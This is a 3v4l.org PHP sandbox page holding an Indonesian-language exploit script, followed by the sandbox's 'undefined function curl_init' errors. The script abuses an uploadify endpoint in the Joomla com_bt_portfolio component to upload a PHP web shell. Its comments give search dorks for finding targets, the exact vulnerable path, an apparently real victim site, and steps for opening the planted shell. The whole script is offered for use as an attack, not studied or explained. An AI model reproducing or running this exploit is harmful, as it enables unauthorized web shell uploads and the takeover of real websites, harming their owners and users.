3v4l.org

run code in 300+ PHP versions simultaneously
<?php # Exploit uploadify pada component Joomla com_bt_portfolio # Exploit ini sama dengan exploit uploadify pada umumnya, yang berbeda cuma url exploitnya.. # Shell yang kamu upload (dalam kasus ini saya beri nama set.php) harus 1 direktori dengan uploader ini. # Save script ini dengan ekstensi php, kemudian kamu tinggal jalankan di terminal (Linux) atau CMD (Windows) # Dork yang bisa kamu gunakan adalah "templates/bt_foto" & "/templates/bt_metro" # Misalkan situsnya seperti ini => http://greenclaws.co.uk/templates/bt_foto/ # Kamu tinggal ubah saja menjadi => http://greenclaws.co.uk/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php # Setelah itu kamu masukkan ke dalam script ini dan langsung aja eksekusi di terminal atau cmd # Kamu jalankan dengan perintah => php namafileini.php # Jika berhasil, maka akan muncul path shellnya seperti gambar berikut ini: http://i.imgur.com/Vrkdqzf.png # Kalau sudah seperti ini tinggal kamu buka di browser urlnya menjadi => http://greenclaws.co.uk/administrator/components/com_bt_portfolio/set.php # # # Spesial for Indonesian Cyber Army dan orang-orang yang menganggapku teman ^_^ $uploadfile="set.php"; $ch =curl_init("situs.com/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile",'folder'=>"/administrator/components/com_bt_portfolio/")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
Output for 7.0.0 - 7.0.33, 7.1.0 - 7.1.33, 7.2.0 - 7.2.33, 7.3.0 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/1dHrr:21 Stack trace: #0 {main} thrown in /in/1dHrr on line 21
Process exited with code 255.
Output for 5.0.0 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.40
Fatal error: Call to undefined function curl_init() in /in/1dHrr on line 21
Process exited with code 255.
Output for 4.4.5 - 4.4.9
Fatal error: Call to undefined function: curl_init() in /in/1dHrr on line 21
Process exited with code 255.
Output for 4.3.2 - 4.3.11, 4.4.0 - 4.4.4
Fatal error: Call to undefined function: curl_init() in /in/1dHrr on line 21
Process exited with code 255.
Output for 4.3.0 - 4.3.1
Fatal error: Call to undefined function: curl_init() in /in/1dHrr on line 21
preferences:
303.45 ms | 401 KiB | 455 Q